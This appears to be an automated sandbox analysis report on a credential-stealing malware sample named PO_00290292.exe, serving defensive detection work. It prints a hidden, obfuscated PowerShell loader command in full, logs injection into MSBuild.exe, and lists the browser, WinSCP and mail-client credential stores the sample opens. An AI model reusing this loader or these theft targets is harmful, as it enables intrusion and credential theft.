                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599203
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599091
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598983
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598547
                Source: MSBuild.exe, 00000005.00000002.2591135790.000000000433C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_?
                Source: MSBuild.exe, 00000005.00000002.2591135790.00000000042EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8X4
                Source: MSBuild.exe, 00000005.00000002.2624055244.00000000212E4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2624055244.0000000021304000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.2609495360.00000000203A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HgFsZzyc1KET+4v5U4KAMADFEcDFNtvv+ITzKbSSW1vwK8EkWnQLLbTwXbLLF50cTbCI
                Source: MSBuild.exe, 00000005.00000002.2591135790.000000000433C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\PO_00290292.exe API call chain: ExitProcess graph end node graph_0-3795
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00F5D6E4 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 4_2_00F5D6E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0118A796 mov eax, dword ptr fs:[00000030h] 5_2_0118A796
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B00000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AFF840
                Source: C:\Users\user\Desktop\PO_00290292.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi 
Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#spejlvende journaliseringssystems conservatorial #><#basilikers toothcomb letfordrvelig #>$portugals = """ko;smfomu rnfac fttwistofonde otpalyinxhui pdskeinser4 f in{ s tv po fi tupovabergaafompa(sm[bes tt hrpeiaunosgev]ov`$spsuiobelanfpsa ulcedto)fo;bu go`$ovnskooprdetnohoburhm cb oeliraal batonbodde fu=sk ru`$ vsspoanlvafheapulhldre.cilhaeprnasgfatinh m;ne l vi af ta`$pod rranielf otsvspasunyexs otsterimbumreeretanssm tr=ch nonarevvwap-lao nbsojope dcstt p tb ry ftsneva[pr]wh ud(le`$minbiolir vtpahmuuudm tbsaepergalafainndedli op/ci st2bo)an; k ps`$prrfiocaduntume pganngyeovtan1st6ug8ab=pi' cs au d'in+ p'edbunssptborunithndog l'aa;af da co im tf fowarde( d`$stnenochncyetexnupudeovccrt fatanpatpa= u0pl;no ho`$nonbyohjnutelix tp oesoc st faunnsvtsy op-shltetre j`$konakovuractquh subumudbyeeovrorlsuamincrdcr;li u`$senmaopintrepaxalpspelochetsmaunnbetba+ro= g2tr) p{se un he he un au ko ta ar`$podder bideftet bstrsboyths btnaeunmknmwaeamtdosca[ s`$scnugoblnmaeapxekpcaerec at hainnentdr/ho2 u] k ka= s da[stcsmopan bvskeler otob] n:zi:untreoaab sybrt geha( d`$ jsmaowilkofhoaovlhodom.no`$atrpaopodgitage ngtnnmaemat f1re6ar8be.coi fnphvsponektiejo(fl`$phn do onboe rxcop resictatinasanbatjo,ln sp2fu)ep,tr k1cl6un)br;po in f`$gadperchimefkotrasovstey ssretboefimsumine wtudsfi[ar`$trnmoo sn ue dxcypbyeroccotananunomtte/ph2no]st ar=so haxgaoknrsoaqummiiba sk`$modshrsei sf utsosprsspylesdotbiedimdomrreuntsps p[ u`$unnaroren aebexhopgee sc ptbaainnintea/be2ov]fi po1pl1 m0gl;ra n un po fl}fo ou[psscotunrphisynsogun]de[pessuy pslitskepymin.katsoe lxanteu.sievan dc uodedprifnn pgsp]ph: e:ayaposooc mifuija.paggee ltbescatstreri wnung b(da`$eldcarisiatfpat bschs symnspttseeudmovmauedrtpas e)ra;un}st`$veebismetbjigamstehardiihantogsmetorch0 d=kopgrysvxpuiovdsme ks l4fi 
sk'au3stdho1af7bo1trdal1syasp0sibri0 h3cr4af0ma0plaba0af2 b0gr2st'ga;ov`$deenesnettiifimbrekirsailenwagfjeborle1py=aup lylexunifedclegesat4op fa'ra2pr3ta0 e7 d0kldun1nocco0li1 r1 tdwe0un1 d0yv8su1 ta o4 r0 a3ny9sl0fo7cr0in0ta5dad k5thclo4 w0kd3 kb f0em0ig1skd d0ref r0ir8bu0fobop2ir0de0 sfug1arama0st7va1be8 a0unbka2ge3ho0jub a1 ra a0vi6 g0 g1an0deaha1kadpr'wh; v`$ cekos stsoi smeneunr ui tnnog seovrme2as=apptaysaxdriundreetessp4in ap'in2 d9bl0crbsa1 aaun3maesk1vacun0ch1te0dddin2slfbu0saaal0tea f1dyc d0tabst1 kdel1trdbr'ra;ca`$faehassetpainim reelrhai fnstgure irgr3 i=lapgaywexflibddsoebospa4no ek're3stdin1mi7un1rudcp1 na n0mabro0fa3 v4ma0br3unc f1mibzo0 h0so1feaka0ma7bl0un3 c0cab d4mo0pr2da7sc0ho0hu1rea i0dibfj1agcfl0ud1su1seeho3phdfo0cabco1 tcgr1re8ma0 d7an0uddbo0atbju1vedpo4jo0mi2 p6 p0 sffo0ju0re0coa s0bl2 s0 lbun3cacnd0unblo0af8 b' m;in`$deecosdrtdri sm se urtriounregske mrpr4ti=dep iypexspispdcee fssu4zo zo'at1padva1soa e1recud0 b7ha0 e0mi0 a9ti'no;sw`$seehasbltseipamkoeovrpoigrngegobe arwi5sk=dipabytoxgaisedore gsvo4st d' f2da9ko0 mbtr1liaad2 u3fe0sl1sk0una p1asbtr0do2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#spejlvende journaliseringssystems conservatorial #><#basilikers toothcomb letfordrvelig #>$portugals = """ko;smfomu rnfac fttwistofonde otpalyinxhui pdskeinser4 f in{ s tv po fi tupovabergaafompa(sm[bes tt hrpeiaunosgev]ov`$spsuiobelanfpsa ulcedto)fo;bu go`$ovnskooprdetnohoburhm cb oeliraal batonbodde fu=sk ru`$ vsspoanlvafheapulhldre.cilhaeprnasgfatinh m;ne l vi af ta`$pod rranielf otsvspasunyexs otsterimbumreeretanssm tr=ch nonarevvwap-lao nbsojope dcstt p tb ry ftsneva[pr]wh ud(le`$minbiolir vtpahmuuudm tbsaepergalafainndedli op/ci st2bo)an; k ps`$prrfiocaduntume pganngyeovtan1st6ug8ab=pi' cs au d'in+ p'edbunssptborunithndog l'aa;af da co im tf fowarde( d`$stnenochncyetexnupudeovccrt fatanpatpa= u0pl;no ho`$nonbyohjnutelix tp oesoc st faunnsvtsy op-shltetre j`$konakovuractquh subumudbyeeovrorlsuamincrdcr;li u`$senmaopintrepaxalpspelochetsmaunnbetba+ro= g2tr) p{se un he he un au ko ta ar`$podder bideftet bstrsboyths btnaeunmknmwaeamtdosca[ s`$scnugoblnmaeapxekpcaerec at hainnentdr/ho2 u] k ka= s da[stcsmopan bvskeler otob] n:zi:untreoaab sybrt geha( d`$ jsmaowilkofhoaovlhodom.no`$atrpaopodgitage ngtnnmaemat f1re6ar8be.coi fnphvsponektiejo(fl`$phn do onboe rxcop resictatinasanbatjo,ln sp2fu)ep,tr k1cl6un)br;po in f`$gadperchimefkotrasovstey ssretboefimsumine wtudsfi[ar`$trnmoo sn ue dxcypbyeroccotananunomtte/ph2no]st ar=so haxgaoknrsoaqummiiba sk`$modshrsei sf utsosprsspylesdotbiedimdomrreuntsps p[ u`$unnaroren aebexhopgee sc ptbaainnintea/be2ov]fi po1pl1 m0gl;ra n un po fl}fo ou[psscotunrphisynsogun]de[pessuy pslitskepymin.katsoe lxanteu.sievan dc uodedprifnn pgsp]ph: e:ayaposooc mifuija.paggee ltbescatstreri wnung b(da`$eldcarisiatfpat bschs symnspttseeudmovmauedrtpas e)ra;un}st`$veebismetbjigamstehardiihantogsmetorch0 d=kopgrysvxpuiovdsme ks l4fi 
sk'au3stdho1af7bo1trdal1syasp0sibri0 h3cr4af0ma0plaba0af2 b0gr2st'ga;ov`$deenesnettiifimbrekirsailenwagfjeborle1py=aup lylexunifedclegesat4op fa'ra2pr3ta0 e7 d0kldun1nocco0li1 r1 tdwe0un1 d0yv8su1 ta o4 r0 a3ny9sl0fo7cr0in0ta5dad k5thclo4 w0kd3 kb f0em0ig1skd d0ref r0ir8bu0fobop2ir0de0 sfug1arama0st7va1be8 a0unbka2ge3ho0jub a1 ra a0vi6 g0 g1an0deaha1kadpr'wh; v`$ cekos stsoi smeneunr ui tnnog seovrme2as=apptaysaxdriundreetessp4in ap'in2 d9bl0crbsa1 aaun3maesk1vacun0ch1te0dddin2slfbu0saaal0tea f1dyc d0tabst1 kdel1trdbr'ra;ca`$faehassetpainim reelrhai fnstgure irgr3 i=lapgaywexflibddsoebospa4no ek're3stdin1mi7un1rudcp1 na n0mabro0fa3 v4ma0br3unc f1mibzo0 h0so1feaka0ma7bl0un3 c0cab d4mo0pr2da7sc0ho0hu1rea i0dibfj1agcfl0ud1su1seeho3phdfo0cabco1 tcgr1re8ma0 d7an0uddbo0atbju1vedpo4jo0mi2 p6 p0 sffo0ju0re0coa s0bl2 s0 lbun3cacnd0unblo0af8 b' m;in`$deecosdrtdri sm se urtriounregske mrpr4ti=dep iypexspispdcee fssu4zo zo'at1padva1soa e1recud0 b7ha0 e0mi0 a9ti'no;sw`$seehasbltseipamkoeovrpoigrngegobe arwi5sk=dipabytoxgaisedore gsvo4st d' f2da9ko0 mbtr1liaad2 u3fe0sl1sk0una p1asbtr0do2Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO_00290292.exe | Code function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, | 0_2_004061A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7348, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: Yara match | File source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7348, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7348, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                Valid Accounts121
                Windows Management Instrumentation
                Path Interception1
                Access Token Manipulation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                3
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                System Shutdown/Reboot
                Acquire InfrastructureGather Victim Identity Information
                Default Accounts11
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts211
                Process Injection
                1
                Obfuscated Files or Information
                21
                Input Capture
                26
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                Exfiltration Over Bluetooth11
                Encrypted Channel
                SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                Domain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)1
                Software Packing
                1
                Credentials in Registry
                121
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration2
                Non-Application Layer Protocol
                Data Encrypted for ImpactDNS ServerEmail Addresses
                Local AccountsCronLogin HookLogin Hook1
                Masquerading
                NTDS1
                Process Discovery
                Distributed Component Object Model21
                Input Capture
                Traffic Duplication13
                Application Layer Protocol
                Data DestructionVirtual Private ServerEmployee Names
                Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                Virtualization/Sandbox Evasion
                LSA Secrets141
                Virtualization/Sandbox Evasion
                SSH2
                Clipboard Data
                Scheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
                Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Access Token Manipulation
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                External Remote ServicesSystemd TimersStartup ItemsStartup Items211
                Process Injection
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                Behavior Graph ID: 1380074 | Sample: PO_00290292.exe | Startdate: 24/01/2024 | Architecture: WINDOWS | Score: 100
                Start node | DNS/IP: mail.qualityaf.com; api4.ipify.org; api.ipify.org | Signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures
                PO_00290292.exe 8 33 started | Dropped files: C:\Users\user\AppData\...\sarawakese.dri (data); C:\Users\user\AppData\Local\...\Lection.Fle (ASCII); C:\Users\user\AppData\Local\...\nse6573.tmp (data); C:\Users\user\AppData\Local\...\nsExec.dll (PE32) | Signatures: Suspicious powershell command line found
                powershell.exe 12 started (child of PO_00290292.exe) | Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                powershell.exe 15 started and conhost.exe started (children of powershell.exe 12) | Signatures on powershell.exe 15: Writes to foreign memory regions; Maps a DLL or memory area into another process
